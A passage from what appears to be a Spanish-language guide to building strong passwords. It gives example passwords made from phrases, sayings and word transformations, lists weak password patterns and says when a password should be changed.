Password: 3ttFacten.

Expresiones inspiradas en el nombre de una ciudad:
Expresión: Colombia tierra querida himno de fe y alegría.
Password: CtqHdefyA.

Comidas aborrecidas durante la infancia:
Comida: Cebolla, ajos y pimienta.
Password: Ceb&ajo$Pim.

Dichos y refranes:
Dicho: Averígüelo, Vargas.
Password: ave%Var.

Técnicas de Transformación

Técnica: Transliteración.
Expresión Ilustrativa: Fotográfica.
Password: pHot-o-Grafik.

Técnica: Intercalar caracteres en palabras sucesivas.
Expresión Ilustrativa: Sierra Nevada.
Password: sinVadaErra.

Técnica: Intercalar caracteres en palabras sucesivas.
Expresión Ilustrativa: Futbol Colombiano.
Password: FcolBoliano.

Técnica: Sustitución con sinónimos.
Expresión ilustrativa: Está lloviendo.
Password: Ke-H2o.

Técnica: Sustitución con antónimos.
Expresión Ilustrativa: chica rubia.
Illustrative Expression: moreNo%eL.

Y ellos han considerado como malas contraseñas:
  1. Palabras que aparezcan en un diccionario.
  2. Palabras en idiomas extranjeros: september, mercy, obrigado
  3. Transformaciones simples de palabras: bogota2002, monita6, amor!
  4. Nombres propios, nombres de ciudades, e iniciales: luzdary, calicali, alexgomez
  5. Palabras solo en mayúsculas o solo en minúsculas
  6. Secuencias alfabéticas o de teclado: qwerty, 12345
  7. Palabras de menos de 4 caracteres.
  8. Passwords que incluyan números telefónicos, números de identificación del usuario, nombre de los hijos, de su mascota o de su madre, nombre de su cantante o grupo musical favorito, nombre o sobrenombre de su novia(o), fecha de nacimiento, nombres de productos.
¿Cuándo debe cambiarse el password?

Cuando no cumple con los criterios explicados arriba.
Cuando tiene más de 6 meses en uso.
Cuando el usuario le ha dado su contraseña a otras personas.
Cuando ha visitado ha ingresado su contraseña en equipos que no son de su propiedad.

En conclusión el mejor password es aquella que se puede recordar y que tiene una combinación en el mismo password de mayúsculas y minúsculas, letras, números y símbolos.